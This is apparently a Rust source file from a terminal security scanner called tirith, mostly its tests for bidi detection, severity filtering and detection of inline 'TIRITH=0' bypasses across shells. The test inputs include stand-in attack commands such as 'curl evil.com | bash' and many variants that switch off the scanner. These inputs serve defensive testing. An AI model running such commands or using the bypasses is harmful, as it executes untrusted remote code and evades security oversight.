953fn enrich_team(findings: &mut [Finding]) {
954    for finding in findings.iter_mut() {
955        if finding.mitre_id.is_none() {
956            finding.mitre_id = mitre_id_for_rule(finding.rule_id).map(String::from);
957        }
958    }
959}
960
#[cfg(test)]
mod tests {
    use super::*;
    use crate::verdict::{Action, Finding, RuleId, Severity, Timings, Verdict};

    // -----------------------------------------------------------------------
    // Shared fixtures
    // -----------------------------------------------------------------------

    /// Interactive POSIX exec-context analysis input with no file/clipboard data.
    fn exec_ctx(input: impl Into<String>) -> AnalysisContext {
        AnalysisContext {
            input: input.into(),
            shell: ShellType::Posix,
            scan_context: ScanContext::Exec,
            raw_bytes: None,
            interactive: true,
            cwd: None,
            file_path: None,
            repo_root: None,
            is_config_override: false,
            clipboard_html: None,
        }
    }

    /// Minimal finding with the given rule, severity and title; everything else empty.
    fn finding(rule_id: RuleId, severity: Severity, title: &str) -> Finding {
        Finding {
            rule_id,
            severity,
            title: title.into(),
            description: String::new(),
            evidence: vec![],
            human_view: None,
            agent_view: None,
            mitre_id: None,
            custom_rule_id: None,
        }
    }

    /// Timings with every measurement zeroed / absent.
    fn zero_timings() -> Timings {
        Timings {
            tier0_ms: 0.0,
            tier1_ms: 0.0,
            tier2_ms: None,
            tier3_ms: None,
            total_ms: 0.0,
        }
    }

    /// Assert that `input` is recognised as an inline `TIRITH=0` bypass for `shell`.
    #[track_caller]
    fn assert_bypass(input: &str, shell: ShellType) {
        assert!(
            find_inline_bypass(input, shell),
            "expected an inline bypass to be detected in {:?}",
            input
        );
    }

    /// Assert that `input` is NOT recognised as an inline bypass for `shell`.
    #[track_caller]
    fn assert_no_bypass(input: &str, shell: ShellType) {
        assert!(
            !find_inline_bypass(input, shell),
            "expected no inline bypass to be detected in {:?}",
            input
        );
    }

    // -----------------------------------------------------------------------
    // End-to-end analysis
    // -----------------------------------------------------------------------

    #[test]
    fn test_exec_bidi_without_url() {
        // Input with bidi control but no URL — should NOT fast-exit at tier 1
        let ctx = exec_ctx(format!("echo hello{}world", '\u{202E}'));
        let verdict = analyze(&ctx);
        // Should reach tier 3 (not fast-exit at tier 1)
        assert!(
            verdict.tier_reached >= 3,
            "bidi in exec should reach tier 3, got tier {}",
            verdict.tier_reached
        );
        // Should have findings about bidi
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, RuleId::BidiControls)),
            "should detect bidi controls in exec context"
        );
    }

    #[test]
    fn test_tirith_command_is_analyzed_like_any_other_exec() {
        let ctx = exec_ctx("tirith run http://example.com");

        let verdict = analyze(&ctx);
        assert!(
            verdict.tier_reached >= 3,
            "user-typed tirith commands should still be analyzed"
        );
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, RuleId::PlainHttpToSink)),
            "tirith run http://... should surface sink findings"
        );
    }

    // -----------------------------------------------------------------------
    // Paranoia filtering
    // -----------------------------------------------------------------------

    #[test]
    fn test_paranoia_filter_suppresses_info_low() {
        let findings = vec![
            finding(RuleId::VariationSelector, Severity::Info, "info finding"),
            finding(RuleId::InvisibleWhitespace, Severity::Low, "low finding"),
            finding(RuleId::HiddenCssContent, Severity::High, "high finding"),
        ];

        // Paranoia 1 (default) and 2 (free tier cap) both show only Medium+:
        // the Info and Low findings are dropped and only the High one survives.
        for paranoia in 1..=2 {
            let mut verdict = Verdict::from_findings(findings.clone(), 3, zero_timings());
            filter_findings_by_paranoia(&mut verdict, paranoia);
            assert_eq!(
                verdict.findings.len(),
                1,
                "paranoia {} should keep only Medium+",
                paranoia
            );
            assert_eq!(verdict.findings[0].severity, Severity::High);
        }
    }

    #[test]
    fn test_paranoia_filter_recalculates_action() {
        let findings = vec![
            finding(RuleId::InvisibleWhitespace, Severity::Low, "low finding"),
            finding(RuleId::HiddenCssContent, Severity::Medium, "medium finding"),
        ];

        // Before paranoia filter: action should be Warn (Medium max)
        let mut verdict = Verdict::from_findings(findings, 3, zero_timings());
        assert_eq!(verdict.action, Action::Warn);

        // After paranoia filter at level 1: Low is removed, only Medium remains → still Warn
        filter_findings_by_paranoia(&mut verdict, 1);
        assert_eq!(verdict.action, Action::Warn);
        assert_eq!(verdict.findings.len(), 1);
    }

    // -----------------------------------------------------------------------
    // Inline bypass: POSIX
    // -----------------------------------------------------------------------

    #[test]
    fn test_inline_bypass_bare_prefix() {
        assert_bypass("TIRITH=0 curl evil.com", ShellType::Posix);
    }

    #[test]
    fn test_inline_bypass_env_wrapper() {
        assert_bypass("env TIRITH=0 curl evil.com", ShellType::Posix);
    }

    #[test]
    fn test_inline_bypass_env_i() {
        assert_bypass("env -i TIRITH=0 curl evil.com", ShellType::Posix);
    }

    #[test]
    fn test_inline_bypass_env_u_skip() {
        assert_bypass("env -u TIRITH TIRITH=0 curl evil.com", ShellType::Posix);
    }

    #[test]
    fn test_inline_bypass_usr_bin_env() {
        assert_bypass("/usr/bin/env TIRITH=0 curl evil.com", ShellType::Posix);
    }

    #[test]
    fn test_inline_bypass_env_dashdash() {
        assert_bypass("env -- TIRITH=0 curl evil.com", ShellType::Posix);
    }

    #[test]
    fn test_no_inline_bypass() {
        assert_no_bypass("curl evil.com | bash", ShellType::Posix);
    }

    #[test]
    fn test_inline_bypass_env_c_flag() {
        // env -C takes a directory arg; TIRITH=0 should still be found after it
        assert_bypass("env -C /tmp TIRITH=0 curl evil.com", ShellType::Posix);
    }

    #[test]
    fn test_inline_bypass_env_s_flag() {
        // env -S takes a string arg; TIRITH=0 should still be found after it
        assert_bypass(
            "env -S 'some args' TIRITH=0 curl evil.com",
            ShellType::Posix,
        );
    }

    #[test]
    fn test_inline_bypass_env_ignore_environment_long_flag() {
        assert_bypass(
            "env --ignore-environment TIRITH=0 curl evil.com",
            ShellType::Posix,
        );
    }

    #[test]
    fn test_no_inline_bypass_for_chained_posix_command() {
        assert_no_bypass("TIRITH=0 curl evil.com | bash", ShellType::Posix);
        assert_no_bypass("TIRITH=0 curl evil.com & bash", ShellType::Posix);
    }

    #[test]
    fn test_inline_bypass_single_quoted_value() {
        assert_bypass("TIRITH='0' curl evil.com", ShellType::Posix);
    }

    #[test]
    fn test_inline_bypass_double_quoted_value() {
        assert_bypass("TIRITH=\"0\" curl evil.com", ShellType::Posix);
    }

    // -----------------------------------------------------------------------
    // Inline bypass: PowerShell
    // -----------------------------------------------------------------------

    #[test]
    fn test_inline_bypass_powershell_env() {
        assert_bypass("$env:TIRITH=\"0\"; curl evil.com", ShellType::PowerShell);
    }

    #[test]
    fn test_inline_bypass_powershell_env_no_quotes() {
        assert_bypass("$env:TIRITH=0; curl evil.com", ShellType::PowerShell);
    }

    #[test]
    fn test_inline_bypass_powershell_env_single_quotes() {
        assert_bypass("$env:TIRITH='0'; curl evil.com", ShellType::PowerShell);
    }

    #[test]
    fn test_inline_bypass_powershell_env_spaced() {
        assert_bypass("$env:TIRITH = \"0\"; curl evil.com", ShellType::PowerShell);
    }

    #[test]
    fn test_inline_bypass_powershell_mixed_case_env() {
        assert_bypass("$Env:TIRITH=\"0\"; curl evil.com", ShellType::PowerShell);
    }

    #[test]
    fn test_no_inline_bypass_powershell_wrong_value() {
        assert_no_bypass("$env:TIRITH=\"1\"; curl evil.com", ShellType::PowerShell);
    }

    #[test]
    fn test_no_inline_bypass_powershell_other_var() {
        assert_no_bypass("$env:FOO=\"0\"; curl evil.com", ShellType::PowerShell);
    }

    #[test]
    fn test_no_inline_bypass_powershell_in_posix_mode() {
        // PowerShell syntax should NOT match when shell is Posix
        assert_no_bypass("$env:TIRITH=\"0\"; curl evil.com", ShellType::Posix);
    }

    #[test]
    fn test_no_inline_bypass_powershell_comment_contains_bypass() {
        assert_no_bypass("curl evil.com # $env:TIRITH=0", ShellType::PowerShell);
    }

    #[test]
    fn test_powershell_bypass_case_insensitive_tirith() {
        // PowerShell env vars are case-insensitive
        assert_bypass("$env:tirith=\"0\"; curl evil.com", ShellType::PowerShell);
        assert_bypass("$ENV:Tirith=\"0\"; curl evil.com", ShellType::PowerShell);
    }

    #[test]
    fn test_powershell_bypass_no_panic_on_multibyte() {
        // Multi-byte UTF-8 after $ should not panic
        assert_no_bypass("$a\u{1F389}xyz; curl evil.com", ShellType::PowerShell);
        assert_no_bypass("$\u{00E9}nv:TIRITH=0; curl evil.com", ShellType::PowerShell);
    }

    // -----------------------------------------------------------------------
    // Inline bypass: cmd.exe
    // -----------------------------------------------------------------------

    #[test]
    fn test_cmd_bypass_bare_set() {
        // `set TIRITH=0 & cmd` is a real Cmd bypass
        assert_bypass("set TIRITH=0 & curl evil.com", ShellType::Cmd);
    }

    #[test]
    fn test_cmd_bypass_whole_token_quoted() {
        // `set "TIRITH=0" & cmd` — whole-token quoting, real bypass
        assert_bypass("set \"TIRITH=0\" & curl evil.com", ShellType::Cmd);
    }

    #[test]
    fn test_cmd_no_bypass_inner_double_quotes() {
        // `set TIRITH="0" & cmd` — cmd.exe stores literal "0", NOT a bypass
        assert_no_bypass("set TIRITH=\"0\" & curl evil.com", ShellType::Cmd);
    }

    #[test]
    fn test_cmd_no_bypass_single_quotes() {
        // `set TIRITH='0' & cmd` — single quotes are literal in cmd.exe, NOT a bypass
        assert_no_bypass("set TIRITH='0' & curl evil.com", ShellType::Cmd);
    }

    #[test]
    fn test_cmd_no_bypass_wrong_value() {
        assert_no_bypass("set TIRITH=1 & curl evil.com", ShellType::Cmd);
    }
}
tirith_core/engine.rs

tirith_core/
engine.rs